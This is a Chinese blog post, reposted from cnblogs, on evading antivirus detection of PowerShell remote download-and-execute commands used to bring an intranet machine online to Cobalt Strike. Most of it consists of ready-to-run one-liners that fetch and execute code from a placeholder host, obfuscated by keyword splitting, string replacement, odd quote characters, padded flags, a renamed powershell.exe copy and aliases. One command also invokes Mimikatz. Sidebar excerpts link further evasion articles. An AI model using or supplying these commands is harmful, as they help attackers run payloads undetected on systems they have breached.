Powershell免杀

最新推荐文章于 2024-08-20 22:22:11 发布
最新推荐文章于 2024-08-20 22:22:11 发布
阅读量2.4k 收藏 10
点赞数 1
分类专栏: 免杀 安全工具 web 文章标签: 免杀
原文链接:https://www.cnblogs.com/chen-w/p/14726549.html
版权
web 同时被 3 个专栏收录
71 篇文章 10 订阅
订阅专栏
安全工具
32 篇文章 3 订阅
订阅专栏
免杀
11 篇文章 0 订阅
订阅专栏

Powershell免杀

本文作者:Chenw
本文链接:https://www.cnblogs.com/chen-w/p/14726549.html

0x01 前言

前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。
img
后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。
img

0x02 Powershell免杀思路

先介绍一下powershell木马最常用的方式,一般都为远程下载然后执行的方法,特点就是:直接内存运行,无文件落地。
例如:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))"

通常使用过程中当调用powershell进行远程下载执行时,会被杀软进行拦截。那么针对Powershell的免杀有两个思路:

  1. 对ps1文件进行免杀处理
  2. 对Powershell的行为进行免杀处理

0x03 免杀方法

1. 使用关键字拆分进行bypass

在实战过程中,一些杀软是会对powershell命令当中的参数、函数进行一个检测,那么此时就可以对关键字进行拆分来进行绕过。
例如,拆分前的powershell命令为:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))”

假如杀软是对http这个关键字进行检测,那么我们可以对其进行如下拆分进行绕过,拆分后的powershell命令为:

powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://x.x.x.x/a''));Invoke-Mimikatz';IEX ($a+$b)”

假如是对downloadstring这个函数进行检测,那么我们可以使用replace来进行替换函数拆分downloadstring进行一个绕过,拆分后的powershell命令如下:

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='123(''http://x.x.x.x'')'.Replace('123','adString');IEX ($a+$b)"

2. Fuzz思想进行bypass

可以利用Fuzz的思想进行bypass,例如可以使用中文字符里的单引号进行bypass
例如,利用单引号混淆前的powershell命令为:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a’))”

使用单引号混淆后的命令为:

powershell.exe "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://x.x.x.x/a’))”

3. 超长命令bypass

可以使用超长的命令来进行bypass。
例如,利用超长命令bypas前的powershell命令为:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a’))”

进行超长命令构造后的powershell命令为:

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal w Normal -w Normal -w Normal -w Normal -w Normal -w Normal IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))

4. 使用copy命令进行bypass

这里讲一个骚操作,一些杀软是检测powershell这个使用的动作,那么我们可以使用windows的copy命令,将powshell进行拷贝命名为其他的,例如,使用copy命令将powershell拷贝一个并命名为bypass.txt
命令:

copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt

那么后面就可以这样子来执行powershell来进行绕过杀软检测:

bypass.txt IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))

5. 混合bypass

就是将前面讲述的几种方法进行混合使用。
例如:

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht‘+’tp://x.x.x.x/a')

0x04 结尾

当然除了上述的几种方式可以进行bypass以外,还有其他的方法,例如可以将 powershell命令打包成exe程序进行绕过,可以使用C、Python、go等,其中查杀率:C > Python > go
img
当然了,年轻人是要讲武德的。
切勿利用上述方法去干不讲武德的事情,不然到时候啪的一下,很快啊,一不小心就进去了。
img

0x05 免责声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

明月清风~~
关注
专栏目录
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 770
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
PowerShell渗透框架
weixin_62626298的博客
07-24 686
NET编程语言编写的。
免杀-PowerShell
weixin_58782362的博客
11-20 776
win自带defender杀毒工具,所以defender和powershell用的同一种语言,很容易被查杀,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
利用powershell进行免杀
PortugalCR7的博客
06-29 219
利用Invoke Obfuscation进行混淆。查看powershell的版本号()
免杀 | powershell免杀的几种简单方式
weixin_66717977的博客
03-13 653
免杀对抗 | powershell免杀 | 免杀技术
Powershell免杀系列(二)
st3pby的博客
02-20 3295
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
Powershell免杀(远程加载shellcode)笔记
jackslowf的博客
06-24 2194
原文链接 远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。 下面代码直接从uri读取字节数组(对的,没仔细看) # remoteshell.ps1 Set-StrictMode -Version 2 function get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_paramete
powershell的一次免杀
Hungchuiho的博客
11-20 4248
powershell介绍 powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。 powershell存在六种执行策略: Unrestricted 权限最高,可以不受限制执行任意脚本 Rest
我的powershell免杀之路
weixin_43939009的博客
07-11 1191
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 / 这次我将结合前人的各种骚操作,以及个人的不断试错,所想所思,来写一篇关于powershell来进行免杀,达到CS多种姿势绕过AV
Powershell工具Powercat(可以理解为免杀nc)
墨痕诉清风的博客
04-15 914
Powershell工具Powercat(可以理解为免杀nc)
powshell可执行免杀的思路
qq_39345447的博客
06-22 460
其实杀软还是很好骗的,我们要想象杀软是如何查杀病毒的。 杀软会读取运行的可执行文件的二进制编码,查找是否含有病毒payload的标记 然后运行的时候也会检查执行的代码是否安全(这里我还是比较难做到,只能做到上传不被杀,过检查),因为可执行文件执行了相关敏感操作杀软会快速识别你这命令的危险程度,这里要看自己构造的命令是否是正常的貌似安全的逻辑。 import base64 import os import glob import subprocess as sp class PowerShell: # fro
免杀powershell
zhangshuaiijie的博客
06-24 251
下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录,在powershell中执行。我看了好几篇去年的文章还是能过的,不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错,在管理员权限下powershell执行。
js敲诈者变种利用PowerShell免杀分析
SAKAISON的博客
08-20 1755
近期360安全中心监测到出现了一种js敲诈者病毒变种,此种敲诈者利用PowerShell进行免杀,通过vt对比各大安全厂商的扫描结果,发现目前杀毒厂商对此种js敲诈者病毒的检出率特别低,本文就由360QEX引擎团队结合js,vbs和宏三种类型的脚本对PowerShell的利用方式进行详细的分析。 0x01 js敲诈者利用PowerShell 首次发现的此类样
powershell免杀详解
最新发布
m0_57836225的博客
08-20 877
也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`,通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释:PowerShell 模块是一种组织和封装 PowerShell 代码的方式,`.psm1`文件包含函数、变量、别名等,可以将一组相关的功能打包在一起,以便在多个脚本中重复使用,提高代码的可维护性和可重用性。
WEB渗透免杀篇-Powershell免杀
qq_59468567的博客
08-15 331
再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗。Powershell行为检测bypass。对函数,参数,变量进行混淆。
powershell免杀思路(超细)
技术超强的网络安全平台
12-17 162
由于付费无法转载请查看请参看: https://forum.butian.net/share/936
Cobalt Strike免杀:利用Powershell隐蔽上线
"Cobalt Strike beacon 免杀上线方法通过 Powershell" 本文将介绍如何使用 Cobalt Strike 创建一个免杀PowerShell payload 并在目标环境中隐蔽上线。Cobalt Strike 是一款广泛用于红队操作和渗透测试的安全工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值